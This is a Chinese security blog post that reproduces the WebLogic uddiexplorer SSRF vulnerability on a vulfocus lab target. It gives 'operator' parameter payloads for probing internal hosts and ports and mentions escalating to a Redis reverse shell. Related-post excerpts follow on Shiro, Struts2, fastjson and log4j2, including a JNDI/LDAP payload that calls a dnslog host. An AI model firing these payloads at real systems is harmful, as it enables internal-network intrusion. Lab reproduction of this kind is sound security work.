weblogic SSRF漏洞
关于weblogic的ssrf漏洞验证~~
00x1漏洞描述
weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
00x2 影响版本
weblogic 10.0.2-10.3.6版本
00x3 漏洞复现
这里使用的是vulfocus[https://vulfocus.cn/#/dashboard]的weblogic靶场。
启动靶场,是404的环境,我刚开始还以为是环境没加载出来,原来可以直接访问uddiexplorer应用。
1 | 访问:http://ip:端口/uddiexplorer/,无需登录即可查看uddiexplorer应用。 |
漏洞存在于search public registries中,访问url:
1 | http://123.58.224.8:31691/uddiexplorer/SearchPublicRegistries.jsp |
点击搜索的同时用burp抓包:
在参数operator处存在漏洞:
(1)探测存活ip
这里直接探测肯定存在的host的ip:
1 | payload:operator=http://123.58.224.8 |
响应表示该ip存在:
若ip不存在:
1 | payload:operator=http://1.1.1.1 |
则响应为:
(2)探测开放端口 payload
1 | payload:operator=http://123.58.224.8:80 |
若80端口存在,则会响应为:
1 | payload:operator=http://123.58.224.8:6379 |
若6379端口不存在,则会响应为:
如果6379端口开放,即redis服务,可以尝试利用反弹shell写入payload加以利用。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 echozt!
相关推荐
2022-05-17
Apache Shiro 1.2.4反序列化漏洞
前几天复现了一下墨者平台的shiro靶场,本篇文章用的是工具检测的~~ 1、漏洞简述Shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化.然而AES的密钥是硬编码的, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的一些开源的项目代码,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 2、影响版本Apache Shiro <= 1.2.4 3、Shiro框架识别(1)请求包的cookie中存在rememberMe字段。 (2)返回包中存在set-Cookie:remeberMe=deleteMe。 (3)请求包中存在rememberMe=x时,响应包中存在rememberMe=deleteMe。(有时候服务器不会主动返回remeberMe=deleteMe,直接发包即可,将Cookie内容改为remember...
2022-05-17
Apache Struts2远程代码执行漏洞(S2-015)
复现的是墨者的Apache Struts2的靶场,用了两种方式,手工和工具检测~~ 漏洞简介:开源应用框架Apache Struts存在远程代码执行漏洞(CVE-2021-31805),攻击者可构造恶意的OGNL表达式触发漏洞,实现远程代码执行。 特征:查看被测应用系统的源码,URL 接口地址以 “.action” “.do” 结尾或地址中包含“!”符号,或者在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下 的 jar 文件,若存在 struts2-core-2..**.jar 或 xwork-core- 2..**.jar 格式的 jar 文件,则需检测是否存在 Struts2 远程代码执行漏洞。 受影响版本为:Apache Struts...
2022-05-17
Apache Struts2远程代码执行漏洞(S2-016)
复现的是墨者的Apache Struts2的靶场,用的工具检测~~ 原理:问题主要出在对于特殊URL处理中,redirect与redirectAction后面跟上OGNL表达式会被服务器执行。 漏洞原因:action的值redirect和redirectAction没有正确过滤,导致可以执行任意代码,如系统命令、上传、下载文件等。 Struts2的DefaultActionMapper支持一种方法,可以使用”action:”, “redirect:” , “redirectAction:”对输入信息进行处理,从而改变前缀参数,这样操作的目的是方便表单中的操作。在2.3.15.1版本以前的struts2中,没有对”action:”, “redirect:” , “redirectAction:”等进行处理,导致ongl表达式可以被执行。 影响版本:Struts 2.0.0 –...
2022-10-12
fastjson反序列化漏洞
验证网站是否存在fastjson漏洞的方法~~ 一、fastjson简介 fastjson是java的一个库,可以使java对象和json格式的字符串相互转换。序列化是将java对象转为为json格式的字符串,反序列化就是将json格式的字符串转为java对象。 二、漏洞简介 fastjson在解析json的过程中,会自动调用@type指定类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 三、漏洞详情 组件名称:fastjson 影响版本:fastjson<=1.2.80 漏洞类型:远程任意代码执行 四、漏洞探测1、根据返回包判断 任意抓包,将提交方式改为POST。返回包就会出现fastjson字样。 2、修改请求包 用burp抓包,将发送方式改为post,更改类型为json,添加json格式的字符串,可以看到返回包中成功了。 12345678POSTContent-Type:...
2022-10-12
log4j2代码执行漏洞
验证网站是否存在log4j2漏洞的方法~~ 一、描述 log4j2是一个基于Java的日志记录框架。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。只要日志内容中包含关键词 ${,那么这里面包含的内容就可以作为变量进行替换,攻击者无需任何权限,可以执行任意命令。 二、验证漏洞是否存在 这里我使用的是vulfocus平台上面的一个log4j2的靶场 方法一:dnslog验证1、先通过dnslog获得一个域名 构造poc: 1${jndi:ldap://o8ll0b.dnslog.cn} 2、用url方式提交payload参数 构造payload:换成url形式: 1payload=%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%6f%38%6c%6c%30%62%2e%64%6e%73%6c%6f%67%2e%63%6e%7d 3、回到dnslog refresh...